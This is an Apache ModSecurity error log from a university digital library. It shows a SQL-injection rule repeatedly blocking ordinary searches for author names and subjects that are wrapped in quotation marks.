[Mon Aug 28 11:35:12.131103 2023] [:error] [pid 41554] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22JONG JEK SIANG\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwkAMCo-f0AAKJSEHwAAAAE"]
[Mon Aug 28 11:39:05.056716 2023] [:error] [pid 41597] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Technological innovation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwk6cCo-f0AAKJ9iw4AAAAO"]
[Mon Aug 28 11:40:08.933176 2023] [:error] [pid 41688] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Putra Ramadhan Efendi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwlKMCo-f0AAKLYkbIAAAAC"]
[Mon Aug 28 11:42:00.927565 2023] [:error] [pid 41708] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Tatik Suryani\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwlmMCo-f0AAKLs8pUAAAAA"]
[Mon Aug 28 11:47:18.534898 2023] [:error] [pid 41747] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Auditor type\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwm1sCo-f0AAKMTgW8AAAAC"]
[Mon Aug 28 11:47:20.144246 2023] [:error] [pid 41524] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Jurnal Manajemen Pemasaran\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwm2MCo-f0AAKI09pMAAAAa"]
[Mon Aug 28 11:52:01.767336 2023] [:error] [pid 41859] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Transglobal leadership\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwn8cCo-f0AAKOD6aYAAAAO"]
[Mon Aug 28 11:52:35.182656 2023] [:error] [pid 41852] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Firms characteristics\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwoE8Co-f0AAKN8IwUAAAAD"]
[Mon Aug 28 12:01:40.911493 2023] [:error] [pid 42028] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Quality of financial statement\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwqNMCo-f0AAKQs5OMAAAAM"]
[Mon Aug 28 12:12:18.711951 2023] [:error] [pid 42246] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Qingliang Tang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwsssCo-f0AAKUGJ3YAAAAD"]
[Mon Aug 28 12:18:23.575961 2023] [:error] [pid 42254] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Siti Neneng Arifah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwuH8Co-f0AAKUOYfcAAAAB"]
[Mon Aug 28 12:19:44.657401 2023] [:error] [pid 42028] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Puspita Agustina\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwucMCo-f0AAKQs5REAAAAM"]
[Mon Aug 28 12:22:51.041780 2023] [:error] [pid 42422] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22acconting\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwvK8Co-f0AAKW2DiAAAAAa"]
[Mon Aug 28 12:26:20.088823 2023] [:error] [pid 42422] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Auditors\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwv-MCo-f0AAKW2DjQAAAAa"]
[Mon Aug 28 12:32:00.462736 2023] [:error] [pid 42657] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Personality\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwxUMCo-f0AAKah@fYAAAAC"]
[Mon Aug 28 12:34:38.591654 2023] [:error] [pid 42738] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hsiao-Tang Hsu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwx7sCo-f0AAKby8KwAAAAK"]
[Mon Aug 28 12:54:35.349366 2023] [:error] [pid 43077] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Janet R. McColl-Kennedy\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw2m8Co-f0AAKhFYMkAAAAP"]
[Mon Aug 28 12:57:36.566431 2023] [:error] [pid 43161] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Yuni Kusminanti\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw3UMCo-f0AAKiZFPkAAAAK"]
[Mon Aug 28 12:58:52.761534 2023] [:error] [pid 43070] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Organizational citizenship behaviour\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw3nMCo-f0AAKg@v94AAAAA"]
[Mon Aug 28 13:15:50.198671 2023] [:error] [pid 43524] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BARRY RENDER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw7lsCo-f0AAKoELYsAAAAK"]
[Mon Aug 28 13:26:47.396769 2023] [:error] [pid 43674] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Giovanni Azzone\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw@J8Co-f0AAKqaCggAAAAI"]
[Mon Aug 28 13:29:51.360555 2023] [:error] [pid 43693] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22leadership\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw@38Co-f0AAKqtn3YAAAAf"]
[Mon Aug 28 13:36:22.431737 2023] [:error] [pid 43985] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Zalailah Salleh\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxAZsCo-f0AAKvR1P0AAAAN"]
[Mon Aug 28 13:36:53.341207 2023] [:error] [pid 44063] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22WILSON, R. EARL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxAhcCo-f0AAKwfzdgAAAAK"]
[Mon Aug 28 13:39:36.559814 2023] [:error] [pid 44115] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Shafira Juniarti Hidayat\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxBKMCo-f0AAKxT9v0AAAAL"]
[Mon Aug 28 14:10:15.047821 2023] [:error] [pid 44629] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PETERSON, A, ROBERT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxIV8Co-f0AAK5VOvgAAAAE"]
[Mon Aug 28 14:22:57.622257 2023] [:error] [pid 44909] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Accounting history\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxLUcCo-f0AAK9tER8AAAAI"]
[Mon Aug 28 14:26:31.316360 2023] [:error] [pid 44951] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Irjus Indrawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxMJ8Co-f0AAK@X5BgAAAAA"]
